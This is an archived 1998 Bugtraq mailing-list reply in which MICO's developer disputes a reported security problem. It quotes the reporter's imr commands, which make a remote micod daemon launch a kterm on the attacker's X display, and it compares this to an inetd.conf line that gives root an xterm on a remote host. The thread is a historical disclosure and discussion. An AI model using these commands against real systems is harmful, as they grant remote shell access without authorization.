Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_2

Bugtraq archives for 2nd quarter (Apr-Jun) 1998: Re: MICO: security problem: Privileges of micod for everybody!

Re: MICO: security problem: Privileges of micod for everybody!

Miguel de Icaza (miguelNUCLECU.UNAM.MX)
Sun, 10 May 1998 17:10:30 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Matt Carter: "Re: nestea2 and HP Jet Direct cards."
Previous message: David LeBlanc: "Re: Samba problems"
In reply to: Dominique Unruh: "MICO: security problem: Privileges of micod for everybody!"
Next in thread: Dominique Unruh: "Re: MICO: security problem: Privileges of micod for everybody!"

> (micod ist started on inet:winkelklinke.local:8888)
> (hacking from enfin.local, which has X on display :0)
>
> imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
> "kterm -display enfin.local:0 & echo" IDL:Anything:1.0
> imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play

I would not consider this an explot, I would consider this just not
understanding what you are doing.

This `exploit' is equivalent to putting in your /etc/inetd.conf:

service stream tcp nowait root /usr/X11R6/bin/xterm -display somehost:0

Users of MICO need to implement their own authentication systems
(which we do, for those who care about the panel).

Best wishes,
Miguel.

Next message: Matt Carter: "Re: nestea2 and HP Jet Direct cards."
Previous message: David LeBlanc: "Re: Samba problems"
In reply to: Dominique Unruh: "MICO: security problem: Privileges of micod for everybody!"
Next in thread: Dominique Unruh: "Re: MICO: security problem: Privileges of micod for everybody!"